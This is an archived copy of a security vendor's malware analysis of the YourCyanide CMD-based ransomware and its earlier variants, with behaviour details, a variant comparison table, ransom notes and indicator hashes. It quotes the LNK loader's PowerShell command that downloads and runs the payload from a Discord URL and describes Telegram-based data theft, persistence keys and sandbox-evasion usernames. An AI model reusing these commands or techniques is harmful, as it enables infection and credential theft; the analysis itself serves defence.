{
	"id": "3ca1718d-7e34-4ca4-9a5a-18756a82c734",
	"created_at": "2026-04-06T00:11:22.804378Z",
	"updated_at": "2026-04-10T13:11:40.642076Z",
	"deleted_at": null,
	"sha1_hash": "ea311d125c64911ae97dcc23b41183ec58919349",
	"title": "YourCyanide: A CMD-Based Ransomware With Multiple Layers of Obfuscation",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 86089,
	"plain_text": "YourCyanide: A CMD-Based Ransomware With Multiple Layers of Obfuscation\r\nPublished: 2022-06-02 · Archived: 2026-04-05 19:24:54 UTC\r\nThe earliest sample of this ransomware, known as GonnaCope, was found by Twitter user Petrovic in April 2022. This\r\nvariant possessed the ability to overwrite its victim's files — however, this was limited to the current directory in which the\r\nransomware was being executed.\r\nUpon checking the latest variant of this malware, we observed that the malware author was sending messages to all users in\r\nthe compromised network notifying them of the infiltration. Along with this, another message was sent stating that\r\n\"Kekware and Kekpop were just the begining\" — indicating that the author was preparing a more sophisticated variant of\r\nthe original ransomware.\r\nTable 1 shows when the additional variants of the original CMD/BAT-based ransomware were uploaded to VirusTotal.\r\nDate earliest sample was uploaded to VirusTotal | Ransomware sample\r\n07 Apr 2022 | GonnaCope\r\n07 May 2022 | Kekpop\r\n11 May 2022 | Kekware\r\n13 May 2022 | YourCyanide\r\nTable 1. 
CMD-based ransomware samples and their date of upload to VirusTotal\r\nYourCyanide technical analysis\r\nIt initially arrives as an LNK file that contains the following PowerShell script for downloading the \"YourCyanide.exe\" 64-bit executable from Discord and executing it:\r\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -Command \"(New-Object\r\nNet.WebClient).DownloadFile('hxxps://cdn.discordapp.com/attachments/974799607894769704/975527548983341056/YourCyanide.exe',\r\n'YourCyanide.exe')\"; start YourCyanide.exe\"\r\nThis 64-bit executable file creates and executes a CMD file with the filename YourCyanide.cmd.\r\nThe dropped YourCyanide.cmd file contains a script downloaded from Pastebin that is saved using the same filename\r\n(YourCyanide.cmd).\r\nThe ransomware will create a registry key in HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce for cleanup\r\npurposes. It then runs advpack.dll to delete the folder containing the malicious CMD file to remove traces of the downloader\r\nfrom the machine.\r\nThe downloaded script file contains 10 layers of obfuscated code, with each layer being needed to deobfuscate the\r\nsucceeding layer. 
It takes advantage of the Enable Extensions and Enable Delayed Extensions commands, causing variables\r\nwithin a batch file to be expanded at execution time rather than at parse time.\r\nThe malware uses the following substring-expansion format for its obfuscation technique:\r\n%parameter:~index of character, number of characters to take%\r\nFor example, %Kesik:~19,1% returns the single character at index 19 of the variable Kesik.\r\nUpon execution, YourCyanide sets its file attributes as hidden and as a system file, then launches five maximized Command\r\nPrompt windows.\r\nIt will then try to add a user \"session\" to the Administrators group using the net localgroup command.\r\nhttps://www.trendmicro.com/en_us/research/22/f/yourcyanide-a-cmd-based-ransomware.html\r\nPage 1 of 9\n\nIt also creates an autostart mechanism for persistence by creating a registry key in\r\nHKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run and then copying itself to the Startup directory. It also disables\r\nTask Manager by modifying its registry entry.\r\nIt then checks if %SystemDrive%\\AutoExec.bat exists, and if so, it deletes the original and then copies itself there and sets the file\r\nto read only, hidden, and as a system file. 
\r\nIt also avoids machines with the following usernames, some of which, according to our research, are usernames used by\r\nmalware researchers and sandbox systems — implying that the malware author is noting which machines should be evaded:\r\na.monaldo\r\nGeorge\r\ngeorge\r\nhelp\r\nkarolisliucveikis\r\nSoumy\r\nguent\r\nAfter checking the username of the infected machine, it drops and executes a batch file in UserProfile\\Documents\\black.bat.\r\nThis batch file is responsible for continuously opening the Blank Screen Saver file, which renders the machine inaccessible\r\nwhile the malware is running.\r\nYourCyanide also terminates several services and security applications by concatenating variables to form the strings \"net\r\nstop,\" \"norton,\" \"symantec,\" and \"McAfee.\"\r\nIt then swaps the mouse buttons using the SwapMouseButton export of user32.dll.\r\nAfter terminating applications, it renames files in the following directories to \u003crandom number\u003e*\u003crandom number\u003e.cyn and overwrites their contents with a random number obtained from the built-in CMD shell variable %random%.\r\n%MyDesktop%\r\n%MyDocuments%\r\n%MyMusic%\r\n%MyPictures%\r\n%MyVideos%\r\n%Downloads%\r\nAlthough no actual encryption is being performed, users will still be heavily inconvenienced due to their files being renamed\r\n— especially those with large numbers of files in these particular folders. 
Furthermore, since the malware is still\r\nunder development, it’s likely that the malware authors are still finalizing the encryption portion of the routine.\r\nIt then creates the following ransom notes and drops them into %MyDesktop%:\r\nYcynNote.txt\r\nother.txt\r\nIt features two instances in which it copies itself to batch files and then appends the malicious code (shown in Figure 16) to\r\nwin.ini and system.ini.\r\nAfter performing its routine, it deletes the black.bat file in the %MyDocuments% directory, which is responsible for\r\nrendering the machine inaccessible. Deleting the file stops the blank screen saver file from continuously opening.\r\nYourCyanide is also capable of spreading via email and to different drives. It creates two VBScript\r\nfiles, mail.vbs and loveletter.vbs, that send an email using the following subjects (with itself as an attachment):\r\nI Have a crush on you\r\nCheck This Out\r\nIt then copies itself to the following drives or directories:\r\nD:\r\nE:\r\nF:\r\nG:\r\nH:\r\n%UserProfile%\r\nYourCyanide enables Remote Desktop Connection (RDP) by using the netsh commands shown in Figure 18.\r\nThe ransomware opens multiple local ports by adding firewall rules for Transmission Control Protocol (TCP) and User\r\nDatagram Protocol (UDP) connections via netsh advfirewall.\r\nIt then downloads and executes another CMD file (ycynlog.cmd) from hxxps://pastebin[.]com/raw/2K5m42Xp.\r\nThe ycynlog.cmd file is responsible for the collection and exfiltration of stolen information from the compromised machine.\r\nLike the main file, it also features multiple layers of obfuscation. 
Upon execution, the file hides itself and creates its\r\nautostart mechanism by producing a registry key in HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run, and by\r\ncopying itself to the Startup directory.\r\nThe malware uses the Telegram chatbot API to exfiltrate the stolen information and stores the API endpoint in a variable named \"Webhook\".\r\nIt downloads another executable from Discord (GetToken.exe). Running this executable creates the file MyTokens.txt,\r\nwhich contains stolen access token data from different applications such as Chrome, Discord, and Microsoft Edge.\r\nIt also collects the following machine information and stores it in userdata.txt:\r\nIP addresses\r\nMAC addresses\r\nCPU Information\r\nMemory Size\r\nPartition information\r\nSystem specifications\r\nOS product key\r\nCurrently running processes\r\nBoth Tokens.txt and userdata.txt will then be sent via the Telegram chatbot API using the curl command.\r\nWe also discovered that YourCyanide exfiltrates Minecraft-related credentials.\r\nFinally, it downloads another executable from Google Docs and executes it using the parameter \"/stext ForME.txt\".\r\nForMe.txt will then be sent to the Telegram chatbot. While the Google Docs link is currently inaccessible, and therefore a\r\nsample can't be sourced, we noticed that it is run using the same parameter as the sample \"passwords.exe,\" which is also\r\nused by the earlier Kekpop variant. The \"/stext\" parameter used when executing the file matches that of the\r\nWebBrowserPassView application, which retrieves credentials stored by various web browsers such as Internet Explorer\r\n(Version 4.0 - 10.0), Mozilla Firefox (all versions), Google Chrome, Safari, and Opera.\r\nThe file created by executing passwords.exe contains saved passwords that are stored in Google Chrome.\r\nAvoiding usernames\r\nOf the usernames this malware avoids, three in particular stand out: a.monaldo, karolisliucveikis, and soumy. 
Upon further research, we discovered that these are usernames from sandbox environments.\r\nFigure: The username of the sandbox machine used by Hunter Yomi\r\nVariant Comparison\r\nThe team analyzed these CMD-based ransomware variants and came up with the following table, which compares each variant and\r\ntheir differences. One notable difference is that GonnaCope, the earliest variant, does not collect user credentials from web\r\nbrowsers or a list of installed applications, and does not enable RDP connections. Furthermore, it does not execute black.bat, the file\r\nthat temporarily causes the machine to become inaccessible while the malware executes its payload. We also observed that\r\nthe BTC address used by GonnaCope is different from the BTC address of the succeeding variants, and it uses a different\r\nransom note format. The variants also differ in their delivery, shifting between arriving as an archive, executable files, or\r\nLNK files that drop the CMD-based ransomware. The payloads are also located in different parts of the chain, with some\r\nbeing found in the main CMD file, while others are found in files that are downloaded from Pastebin and Discord.\r\nBehavior | GonnaCope | Kekware | Kekpop\r\nCreates auto-start mechanism | Yes | Yes | Yes\r\nDisables task manager | Yes | Yes | Yes\r\nChecks the username of the machine | No | Yes | Yes\r\nCreates and executes black.bat to continuously turn on Blank Screen Saver | No | Yes | Yes\r\nStops services | Yes | Yes | Yes\r\nTerminates applications | Yes | Yes | Yes\r\nSwaps mouse buttons | Yes | Yes | Yes\r\nRenames files | GonnaCope.cope; random.cope | \u003cRandom\u003e.\u003cfile extension\u003e.\u003cRandom\u003e.cyn | \u003cRandom\u003e.\u003cfile exte; \u003cRandom\u003e.kekpop\r\nGathers a list of installed applications | No | Yes | Yes\r\nCollects machine information | Yes | Yes | Yes\r\nCollects token access data | Yes | Yes | Yes\r\nCollects passwords saved in web browsers | No | Yes | Yes\r\nSends an email with a copy of itself as an attachment | Yes | Yes | Yes\r\nSubject of sent email | Is this you?; Here is that document you needed | I Have a crush on you; Check This Out | I Have a crush on you\r\nCopies itself in drives | Yes | Yes | Yes\r\nEnables RDP connection | No | Yes | Yes\r\nRansom note message (GonnaCope): Your files are unusable pay $100 in bitcoin to bc1qlly4puaz7pz3zmph8n2d620jc2j60qf4ve5qll to get your files back or allow it into outlook for a decryption key\r\nRansom note message (Kekware): Q: What happened to my files / A: They got encrypted by kekware. / Q: how can i get them back / A: You can get them back by paying $500 in bitcoin to this btc wallet bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf. / Q: What happens if i dont pay / A: You will never get your files back.\r\nRansom note message (Kekpop): Q: What happened to / A: They got encrypted / Q: how can i get them / A: You can get them b / bitcoin to this btc wal / bc1qrl532s9r2qge8d8 / Q: What happens if i / A: You will never get / Q: Is this related to kp / A: No fuck kpop\r\nOther messages: kekpop is on your net\r\nBTC wallet used | bc1qlly4puaz7pz3zmph8n2d620jc2j60qf4ve5qll | bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf | bc1qrl532s9r2qge8d8\r\nConclusion\r\nThe continued use of heavily obfuscated scripts results in very low detection rates for these CMD-based ransomware variants, making it\r\neasier for them to compromise victims’ machines. Even though the technique is not new, the use of multiple layers of custom environment\r\nvariables for obfuscation is highly effective in avoiding detection. 
These ransomware variants are also capable of\r\ndownloading multiple payloads, performing lateral movement via emails, and using Discord, Pastebin and even Microsoft\r\ndocument links.\r\nFrom our analysis, we can infer that the malware author is actively monitoring the reports published by malware\r\nresearchers, taking note of the usernames found in their sandbox logs and reports, and adding them to the evasion list of\r\nusernames and machines that is part of the malware's initialization routine.\r\nRansomware variants that possess multiple capabilities — such as the one analyzed in this blog entry — are gaining\r\npopularity. While YourCyanide and its other variants are currently not as impactful as other families, they\r\nrepresent an interesting update to ransomware kits by bundling a worm, a ransomware, and an information stealer into a\r\nsingle mid-tier ransomware framework.\r\nIt is also likely that these ransomware variants are still in their development stages, making it a priority to detect and block them\r\nbefore they can evolve further and do even more damage.\r\nTrend Micro solutions\r\nA multilayered approach can help organizations defend against ransomware attacks using security technologies that can\r\ndetect malicious components and suspicious behavior.\r\nTrend Micro Vision One™ provides multilayered protection and behavior detection, which helps block\r\nsuspicious behavior and tools before the ransomware can do any damage.\r\nTrend Micro Cloud One™ Workload Security protects systems against both known and unknown threats that\r\nexploit vulnerabilities through virtual patching and machine learning.\r\nTrend Micro™ Deep Discovery™ Email Inspector employs custom sandboxing and advanced analysis\r\ntechniques to effectively block malicious emails that can serve as entry points for ransomware.\r\nTrend Micro Apex One™ offers automated threat detection and response against advanced 
concerns such as\r\nfileless threats and ransomware, ensuring endpoint protection.\r\nIndicators of Compromise\r\nGONNACOPE\r\nFile SHA256 Detection\r\nGonnaCope.Bat ab71472e5a66740369c70715245a948d452a59ea7281233d6ad4c53dfa36b968 Trojan.BAT.GONNACOPE.A\r\nGonnaCope.Bat 0dff760288b3dfebc812761a2596563e5f0aea8ffc9ca4a4c26fa46e74311122 Trojan.BAT.GONNACOPE.THEOEBB\r\nGonnaCopeDL f9fdfb0d4e2d2ea06ce9222280cd03d25c9768dfa502b871846153be30816fd3 Trojan.MSIL.GONNACOPE.A\r\nGonnaCopeCryptor 2987b5cacc9de6c3a477bd1fc21b960db3ea8742e3b46906d134aa8b73f17280 Ransom.MSIL.GONNACOPE.YXCEE\r\nGonnaCope 7388722c3a19854c1ccf19a92798a7cef0efae538e8e8ecf5e79620e6a49cea7 TrojanSpy.MSIL.GONNACOPE.A\r\nGonnaCopeRansNote 7edb2d152d8744343222b1b93ff846616fc3ca702e96c7e7a3663d2d938d8374 Ransom.MSIL.GONNACOPE.A.note\r\nmail.vbs 26bde18048c32f6612d8d76b8696b2ce59db227913dccd51f696b51640ee11e9 Worm.VBS.GONNACOPE.A\r\nmsg.vbs ca84abd94b65d69ee8d26ffc3cc63a5a0886136e63d405ac293fefecc1d2ff3a PUA.VBS.GonnaLoop.A\r\nmsgbox.vbs d12e08e5dd94021dfa59d36d3adfe7f47df180023a04be781fa7695adc5ccc54 PUA.VBS.GonnaLoop.A\r\nnokeyboard.reg a029ae77eced03e515a2acb0ee8ebecf3aebea402e441beef1615e3488234f8e PUA.Win32.Disabler.A\r\nReadme.txt 9c39b7535b527df3b70800562bad98dc2e046de321fe3914dab896eda753cf38 Ransom.Win32.GONNACOPE.YXCEW.no\r\ndownloader.vbs 45189864b6ff6d844d27b59123d2cd461f539d42b362e60e49da50119f0b7083 Trojan.VBS.GONNACOPE.A\r\nKEKPOP\r\nFile SHA256 Detection\r\nArrival\r\nc8d6298f5ef09a324bb6afc7bb4550857fbd0fcbaea2b315b4f00d78bcc6a262\r\nTrojan.BAT.KEKPOP.THEACBB\r\n296ba1469d072c37c6361fe80ba396a92f6461b9562103a3b5a20841d0757722\r\nMain File 
\r\nbfd9336deeb399f412c51f8f6797e6b5dc81afa1f1638ab937a28df733a78c0f\r\nRansom.BAT.KEKPOP.THEAABB\r\nf8a0d9ea41c2b9082f9aebbc7e337b22d1092dd307ccd34d71fdbd56fd94a41d\r\n1e791e8511ac29bf4fd2a289ed35bb24151a7b0bfa3ab9854b2a586ede050a54\r\nd2d25dee61b17133415b4856412f20134823177effccd53a1f14677d372a4b56\r\nDropped BAT File 1 Trojan.BAT.KEKPOP.THEACBB\r\nDropped BAT File 2 9b087a352fcb0a61545dbd68f7dfa32e0e15f98ca1547207d9ff918881ff5c75 TrojanSpy.BAT.KEKPOP.THEACBB\r\nDropped BAT File 3 7fed00a9456b6945813f46294d2f587e7486b38917a8818a77774a2a8e2cfe9b Trojan.BAT.KEKPOP.THEACBB\r\nDropped Text File Ransom.BAT.KEKPOP.THEACBB.note\r\nDropped HTML File Ransom.HTML.KEKPOP.THEACBB.note\r\nPasswords.exe 53043bd27f47dbbe3e5ac691d8a586ab56a33f734356be9b8e49c7e975241a56 HackTool.Win32.NirsoftPT.SM\r\nGetToken.exe 6ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983 Trojan.MSIL.TOKENSTEALER.YXCES\r\nkekpopdicord.exe e5f589027e859e8bedb2d5fbecff37dcf7bcf7e4af6671c1c0c9aac9b6712913 Trojan.Win64.KEKPOP.YXCET\r\nTrojan.BAT.KEKPOP.YXCEZ\r\nKEKWARE\r\nFile SHA256 Detection\r\nArrival\r\n3262ece43e7135c9ed6788588bae269ed75db800964d48cfb762542e0d003259 Trojan.PS1.KEKPOP.YXCEST\r\n23269070507a70c34a4e219f9be19943211ed38eec4a9ce2b3a49bf76676a5e3 Trojan.PS1.KEKPOP.YXCEST\r\nMain File e0946a55e9cbdb3485f154f72994bad765b74ba280a2149485af113503b7dc78 Trojan.BAT.KEKPOP.YXCEST\r\nYcynNote.txt 602533e3c67a248e4dc152fa266a372dd2b2d82ff68fdc17c1591ecc429147bc Ransom.BAT.KEKPOP.YXCEST.note\r\nrAndom.cmd 7fed00a9456b6945813f46294d2f587e7486b38917a8818a77774a2a8e2cfe9b Trojan.BAT.KEKPOP.THEACBB\r\ncynlog.cmd 9b087a352fcb0a61545dbd68f7dfa32e0e15f98ca1547207d9ff918881ff5c75 TrojanSpy.BAT.KEKPOP.THEACBB\r\nPasswords.exe 53043bd27f47dbbe3e5ac691d8a586ab56a33f734356be9b8e49c7e975241a56 HackTool.Win32.NirsoftPT.SM\r\nGetToken.exe 
6ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983 Trojan.MSIL.TOKENSTEALER.YXCES\r\nblack.bat 07fab8134ff635078cab876dba1e35c536936d193a3667637e0561c6efbb0a85 Trojan.BAT.KEKPOP.YXCEST\r\nloveletter.vbs f0afc40bec9453d38f2cd7d70e25bc76797839c2d28180904295639080013416 Worm.VBS.MASSMAIL.YXCEST\r\nmail.vbs 080c4f412087aa3b652e8777ea00c801424ad6c4326bf020b9c264440e37c868 Worm.VBS.MASSMAIL.YXCEST\r\nfasdgfsdga.cmd 56622656231060b6401dcea515953d517fd9212b8de66c33c4847840aa958c83 Trojan.BAT.POWLOAD.TIAOELC\r\nYOURCYANIDE\r\nFile SHA256 Detection\r\nLNK 31655244d3b77ae661f10199cd823f54c473d92a88ae892ee1b75bc5794482ad Trojan.LNK.KEKPOP.YXCEST\r\n9e973f75c22c718c7438bc1d4614be11ae18e2d5140ecc44c166b5f5102d5fbe Trojan.LNK.KEKPOP.YXCERT\r\nc5d842735709618ee4f2521c95bf029a0690c3cbe5f7a06a916f633ebe09dd50 Trojan.LNK.KEKPOP.YXCERT\r\nf9a2c524c270d581b83c010136402c00623bb36b2dd7758ea5e59c9369fa7649 Trojan.LNK.KEKPOP.YXCERT\r\nWin64 EXE Dropper\r\n8249d6e886a97aec60d35d360773e76c6630d822817dabe1c7674a0b51965669 Trojan.Win64.KEKPOP.YXCEST\r\nd51538d8da12af8ae36f95b645e76218e4fd61ab433504a3900c14942160446c Trojan.Win64.KEKPOP.YXCERT\r\n6a645f72acf1d6c906e8c844e4e8b3fc92c411bf69937cfe7069df2cc51b8a4e Trojan.Win64.KEKPOP.YXCERT\r\n2f2fac2c91268a9b31401633b63a374242e46919dc21106466c6c05bab3ce3f8 Trojan.Win64.KEKPOP.YXCERT\r\na180c31666788fb6a7da421a743bb1c487099297ec06f2bdd841f342021f3763 Trojan.Win64.KEKPOP.YXCERT\r\nDownloader of the payload\r\nb43d1af1abeef8b552f0b362b2162c3a940a843f5474518c665e145b3aa01ace Trojan.PS1.KEKPOP.YXCEST\r\n6e33a2c56b7b32be8e99a15920cf179b4e7aa62eaef8496ace67261543569c25 Trojan.LNK.KEKPOP.YXCERT\r\nMain File (YourCyanide.cmd)\r\n6ab0e2e13c32b18b06b9b93b1fe607a7e04a5c0ba09816c36fba1573a47ded91 Trojan.BAT.KEKPOP.AB\r\nf8860ce270a2dec3ae1c51ff2c9aea5efe0015d519ebac4ca4c1ac0d97e73323 
Ransom.BAT.KEKPOP.YXCERT\r\n8f0dbf9a6841ced62d7f5c130f420bd5a2b39141097fefba9727034d1bf3b402 Ransom.BAT.KEKPOP.YXCERT\r\n67a1e573955304887d30ff924eb01ba8a60a188835d7275265ecc716360fb0cf Ransom.BAT.KEKPOP.YXCERT\r\na3523e2ba2c221593a0c16640bfeef8cd146f747fa62620cc2834e417578c34c Ransom.BAT.KEKPOP.YXCERT\r\n0ed64dd6e08e5b9c9282966f439ab8881b4611052838db1ef79fabc38b8a61d2 Ransom.BAT.KEKPOP.YXCERT\r\nblack.bat 07fab8134ff635078cab876dba1e35c536936d193a3667637e0561c6efbb0a85 Trojan.BAT.KEKPOP.YXCEST\r\nycynlog.cmd 298c325bbc80af8b3ac77365dd7cc3f97000a8377f36937d8563ab743a92b21c TrojanSpy.BAT.KEKPOP.YXCEST\r\nYcynNote.txt 4e455d4b353c7cce0155ce1050afc30d064fd93c57bc6428eb3cd988ecd855f0 Ransom.BAT.KEKPOP.YXCERT.note\r\nother.txt a4c3412ac96061561c6cf05a259dd14e5151fe66eee115ff154d6a0366ba1a12 N/A - non-malicious component\r\nloveletter.vbs f0afc40bec9453d38f2cd7d70e25bc76797839c2d28180904295639080013416 Worm.VBS.MASSMAIL.YXCEST\r\nmail.vbs 080c4f412087aa3b652e8777ea00c801424ad6c4326bf020b9c264440e37c868 Worm.VBS.MASSMAIL.YXCEST\r\nGetToken.exe 6ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983 Trojan.MSIL.TOKENSTEALER.YXCES\r\nForMe.exe N/A\r\n316403043e4135474637c0e3f958e72015a08242dc2712f7635012e253cb81b2 Trojan.LNK.KEKPOP.YXCEST\r\n6a95f52d228316f9b48618a1c728e1c47ec71843e5b4cfb76ab3ef86dcd8cf8c Trojan.LNK.KEKPOP.YXCEST\r\nRead_Me.txt.cmd 77fd8fba88236d5f55bbb12dbaaa69ee7673397d8606c0c67b22ce523af818cd Trojan.BAT.POWLOAD.TIAOELB\r\nMain File (WinBugsFix.cmd)\r\n40b923db9c5da6b3bfe345139c42a71e2fd124de6a2808f8cec2a979a044f191 Ransom.BAT.KEKPOP.YXCEST\r\nb0f7c2021c00a1d495f408295d161befa3faceab02d9c4047cee4904db6c1272 Ransom.BAT.KEKPOP.YXCEST\r\nSource: https://www.trendmicro.com/en_us/research/22/f/yourcyanide-a-cmd-based-ransomware.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/22/f/yourcyanide-a-cmd-based-ransomware.html"
	],
	"report_names": [
		"yourcyanide-a-cmd-based-ransomware.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434282,
	"ts_updated_at": 1775826700,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ea311d125c64911ae97dcc23b41183ec58919349.pdf",
		"text": "https://archive.orkl.eu/ea311d125c64911ae97dcc23b41183ec58919349.txt",
		"img": "https://archive.orkl.eu/ea311d125c64911ae97dcc23b41183ec58919349.jpg"
	}
}